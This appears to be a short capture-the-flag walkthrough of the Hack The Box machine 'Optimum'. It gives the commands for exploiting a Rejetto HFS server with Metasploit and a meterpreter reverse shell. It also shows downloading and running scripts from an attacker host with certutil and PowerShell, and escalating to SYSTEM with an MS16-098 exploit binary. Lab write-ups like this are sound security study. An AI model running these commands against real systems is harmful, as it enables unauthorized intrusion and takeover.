Optimum
HTB 7. Optimum
- 1.
nmap -A -T4 -p- 10.10.10.8
reveals only port 80 runninghttpd 2.3
- 2.Going to
10.10.10.8
shows its a file server - 3.Search for default credentials (httpd has no default credentials)
- 4.
searchsploit rejetto
(since rejetto is the vender of this file server) - 5.Search google for
rejetto hfs 2.3 exploit
reveals metasploit remote code execution and many others - 6.Nmap reveals probably an OS that the exploit works on
- 7.Metasploit
use exploit/windows/http/rejetto_hfs_exec
, set rhsots, and set payload towindows/x64/meterpreter/reverse_tcp
- 8.
set lhost tun0
instead of typing in IP (because its faster) - 9.
sysinfo
showsx64
onx64
andgetid
iskostas
- 10.Attempt priv esc:
getsystem
fails,background
anduse post/multi/recon/local_exploit_suggester
(set session 1
) andrun
reveals nothing - 12.Search google for
windows 2002 r2 (build 9600) privilege escalation
revealsexploit-db
exploit avaible that might possibly work - 13.Search
ms16-032
in metasploit shows there is a module for it. Letsuse
it. Set target to1
which isx64
. Setlhost tun0
andlport 443
. Ran twice; didn't work. - 14.Manual method: Download
sherlock
above assher.ps1
. Start http server with python and use cerutil (certutil -urlcache -f http://10.10.14.14/sher.ps1 sher.ps1
) to download file. Run withpowershell.exe -exec bypass -Command "& {Import-Module .\sher.ps1; Find-AllVulns}"
. Result: 3 Potential vulnerabilities - 15.
- 16.Run
systeminfo
in shell on target and put in text file forwindows-exploit-suggester.py
. - 17.Run
python ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt
which detectsMS16-098
exploit; download exploit fromexploit-db
. - 18.
gcc 41020.c ex.exe
fails so lets download the binary from the link provided onexploit-db
. - 19.Run python web server, download to target, and run with
sh.exe
. - 20.
whoami
gives usnt authority\system
Last modified 9mo ago